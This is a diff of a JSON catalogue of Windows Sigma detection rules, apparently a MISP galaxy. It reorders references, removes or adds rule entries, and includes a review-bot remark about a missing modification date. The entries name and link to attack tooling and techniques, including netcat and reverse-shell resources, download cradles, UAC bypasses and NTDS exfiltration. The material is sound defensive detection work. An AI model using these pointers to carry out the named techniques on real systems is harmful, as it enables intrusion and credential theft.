- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview",
"https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview",
"https://github.com/tevora-threat/SharpView/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpview.yml"
],
@@ -68867,9 +65940,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/hfiref0x/UACME",
- "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
"https://lolbas-project.github.io/lolbas/Binaries/Wsreset/",
+ "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
+ "https://github.com/hfiref0x/UACME",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml"
],
"tags": [
@@ -68890,40 +65963,6 @@
"uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658",
"value": "UAC Bypass WSReset"
},
- {
- "description": "Detects Ryuk ransomware activity",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2019/12/16",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_ryuk.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/",
- "https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1547.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "c37510b8-2107-4b78-aa32-72f251e7a844",
- "value": "Potential Ryuk Ransomware Activity"
- },
{
"description": "Detects the execution of DeviceCredentialDeployment to hide a process from view",
"meta": {
@@ -68970,8 +66009,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
"https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_execution.yml"
],
"tags": [
@@ -69123,9 +66162,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md",
"https://nmap.org/ncat/",
"https://www.revshells.com/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_netcat.yml"
],
"tags": [
@@ -69158,10 +66197,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
"https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
+ "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
"https://twitter.com/egre55/status/1087685529016193025",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
"https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download.yml"
],
@@ -69263,9 +66302,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://ss64.com/ps/foreach-object.htmll",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md",
"https://ss64.com/nt/for.html",
- "https://ss64.com/ps/foreach-object.htmll",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_scan_loop.yml"
],
"tags": [
@@ -69498,8 +66537,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608",
"https://h.43z.one/ipconverter/",
+ "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml"
],
"tags": [
@@ -69544,38 +66583,46 @@
"value": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE"
},
{
- "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report",
+ "description": "Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\nThis is used as an obfuscation and masquerading techniques. Only \"perfect\" homoglyphs are included; these are characters that\nare indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.\n",
"meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/07/10",
+ "author": "Micah Babinski, @micahbabinski",
+ "creation_date": "2023/05/07",
"falsepositive": [
- "Unknown"
+ "Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use."
],
- "filename": "proc_creation_win_apt_evilnum_jul20.yml",
- "level": "critical",
+ "filename": "proc_creation_win_homoglyph_cyrillic_lookalikes.yml",
+ "level": "medium",
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
- "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml"
+ "http://www.irongeek.com/homoglyph-attack-generator.php",
+ "https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_homoglyph_cyrillic_lookalikes.yml"
],
"tags": [
"attack.defense_evasion",
- "attack.t1218.011"
+ "attack.t1036",
+ "attack.t1036.003"
]
},
"related": [
{
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "related-to"
}
],
- "uuid": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0",
- "value": "EvilNum APT Golden Chickens Deployment Via OCX Files"
+ "uuid": "32e280f1-8ad4-46ef-9e80-910657611fbc",
+ "value": "Potential Homoglyph Attack Using Lookalike Characters"
},
{
"description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique",
@@ -69634,39 +66681,6 @@
"uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8",
"value": "Suspicious Process Created Via Wmic.EXE"
},
- {
- "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2019/10/02",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_aptc12_bluemushroom.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.010"
- ]
- },
- "related": [
- {
- "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0",
- "value": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32"
- },
{
"description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)",
"meta": {
@@ -69680,10 +66694,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/",
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7",
+ "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_susp_execution.yml"
],
"tags": [
@@ -69798,8 +66812,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup",
"https://twitter.com/Oddvarmoe/status/1641712700605513729",
+ "https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ksetup_password_change_computer.yml"
],
"tags": [
@@ -69825,10 +66839,10 @@
"logsource.product": "windows",
"refs": [
"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil",
- "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html",
- "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/",
"https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee",
+ "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md",
+ "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml"
],
"tags": [
@@ -70010,8 +67024,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py",
"https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1",
+ "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml"
],
"tags": [
@@ -70174,8 +67188,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/Kevin-Robertson/Inveigh",
"https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
+ "https://github.com/Kevin-Robertson/Inveigh",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_inveigh.yml"
],
"tags": [
@@ -70242,8 +67256,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown",
+ "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_logoff.yml"
],
"tags": [
@@ -70309,8 +67323,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget",
"https://learn.microsoft.com/en-us/windows/package-manager/winget/source",
+ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml"
],
"tags": [
@@ -70444,11 +67458,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
- "https://isc.sans.edu/diary/22264",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
"https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://isc.sans.edu/diary/22264",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml"
],
"tags": [
@@ -70491,8 +67505,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/nao_sec/status/1530196847679401984",
"https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/",
+ "https://twitter.com/nao_sec/status/1530196847679401984",
"https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/",
"https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml"
@@ -70556,9 +67570,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA",
"https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html",
"https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/",
+ "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml"
],
"tags": [
@@ -70591,8 +67605,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/GelosSnake/status/934900723426439170",
"https://asec.ahnlab.com/en/39828/",
+ "https://twitter.com/GelosSnake/status/934900723426439170",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml"
],
"tags": [
@@ -70613,18 +67627,19 @@
"value": "System File Execution Location Anomaly"
},
{
- "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression",
+ "description": "Detects PowerShell download and execution cradles.",
"meta": {
"author": "Florian Roth (Nextron Systems)",
"creation_date": "2022/03/24",
"falsepositive": [
- "Scripts or tools that download files and execute them"
+ "Some PowerShell installers were seen using similar combinations. Apply filters accordingly"
],
"filename": "proc_creation_win_powershell_download_iex.yml",
"level": "high",
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
"https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml"
],
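Review bot: the description, falsepositive and refs of proc_creation_win_powershell_download_iex all change in this hunk while "creation_date" stays at 2022/03/24 and no modification date is emitted, so a downstream consumer cannot tell the entry was updated. Consider carrying the Sigma rule's modified field into meta alongside creation_date.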
@@ -70643,7 +67658,7 @@
}
],
"uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775",
- "value": "PowerShell Web Download and Execution"
+ "value": "PowerShell Download and Execution Cradles"
},
{
"description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)",
@@ -70692,8 +67707,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_service.yml"
],
"tags": [
@@ -70825,9 +67840,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Scripts/Winrm/",
"https://twitter.com/bohops/status/994405551751815170",
"https://redcanary.com/blog/lateral-movement-winrm-wmi/",
+ "https://lolbas-project.github.io/lolbas/Scripts/Winrm/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml"
],
"tags": [
@@ -70860,8 +67875,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
"https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml",
+ "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_email_exfil.yml"
],
"tags": [
@@ -70914,40 +67929,6 @@
"uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4",
"value": "Potential PowerShell Obfuscation Via Reversed Commands"
},
- {
- "description": "Detects a command used by conti to exfiltrate NTDS",
- "meta": {
- "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)",
- "creation_date": "2021/08/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_conti_7zip.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
- "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml"
- ],
- "tags": [
- "attack.collection",
- "attack.t1560"
- ]
- },
- "related": [
- {
- "dest-uuid": "53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "aa92fd02-09f2-48b0-8a93-864813fb8f41",
- "value": "Conti NTDS Exfiltration Command"
- },
{
"description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)",
"meta": {
@@ -70980,6 +67961,39 @@
"uuid": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab",
"value": "Process Creation Using Sysnative Folder"
},
+ {
+ "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.",
+ "meta": {
+ "author": "pH-T (Nextron Systems)",
+ "creation_date": "2023/04/17",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_pua_crassus.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/vu-ls/Crassus",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_crassus.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1590.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "e3b168bd-fcd7-439e-9382-2e6c2f63514d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "2c32b543-1058-4808-91c6-5b31b8bed6c5",
+ "value": "PUA - Crassus Execution"
+ },
{
"description": "Detects usage of winget to add new additional download sources",
"meta": {
@@ -70993,8 +68007,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget",
"https://learn.microsoft.com/en-us/windows/package-manager/winget/source",
+ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_custom_source.yml"
],
"tags": [
@@ -71104,8 +68118,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/",
"https://securityxploded.com/",
+ "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_secutyxploded.yml"
],
"tags": [
@@ -71239,10 +68253,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://youtu.be/5mqid-7zp8k?t=2481",
- "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
"https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/",
+ "https://youtu.be/5mqid-7zp8k?t=2481",
"https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
+ "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_mailboxexport_share.yml"
],
"tags": [
@@ -71266,8 +68280,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml"
],
"tags": [
@@ -71402,9 +68416,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://github.com/winsiderss/systeminformer",
"https://processhacker.sourceforge.io/",
"https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/",
- "https://github.com/winsiderss/systeminformer",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_process_hacker.yml"
],
"tags": "No established tags"
@@ -71426,8 +68440,8 @@
"logsource.product": "windows",
"refs": [
"https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/",
- "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
"https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html",
+ "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml"
],
"tags": [
@@ -71460,8 +68474,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md",
+ "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml"
],
"tags": [
@@ -71580,40 +68594,6 @@
"uuid": "0afbd410-de03-4078-8491-f132303cb67d",
"value": "Renamed NetSupport RAT Execution"
},
- {
- "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/12/08",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_ta505_dropper.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/ForensicITGuy/status/1334734244120309760",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.g0092",
- "attack.t1106"
- ]
- },
- "related": [
- {
- "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4",
- "value": "TA505 Dropper Load Pattern"
- },
{
"description": "Detects the execution of msiexec.exe from an uncommon directory",
"meta": {
@@ -71660,8 +68640,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100",
"https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html",
+ "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml"
],
"tags": [
@@ -71681,58 +68661,6 @@
"uuid": "208748f7-881d-47ac-a29c-07ea84bf691d",
"value": "Suspicious Outlook Child Process"
},
- {
- "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/05/20",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_greenbug_may20.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml"
- ],
- "tags": [
- "attack.g0049",
- "attack.execution",
- "attack.t1059.001",
- "attack.command_and_control",
- "attack.t1105",
- "attack.defense_evasion",
- "attack.t1036.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "3711eee4-a808-4849-8a14-faf733da3612",
- "value": "Greenbug Espionage Group Indicators"
- },
{
"description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)",
"meta": {
@@ -71746,9 +68674,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
- "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
"https://twitter.com/vxunderground/status/1423336151860002816?s=20",
+ "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
+ "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_shadowcopy_access.yml"
],
"tags": [
@@ -71781,9 +68709,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec",
"https://twitter.com/_st0pp3r_/status/1583914515996897281",
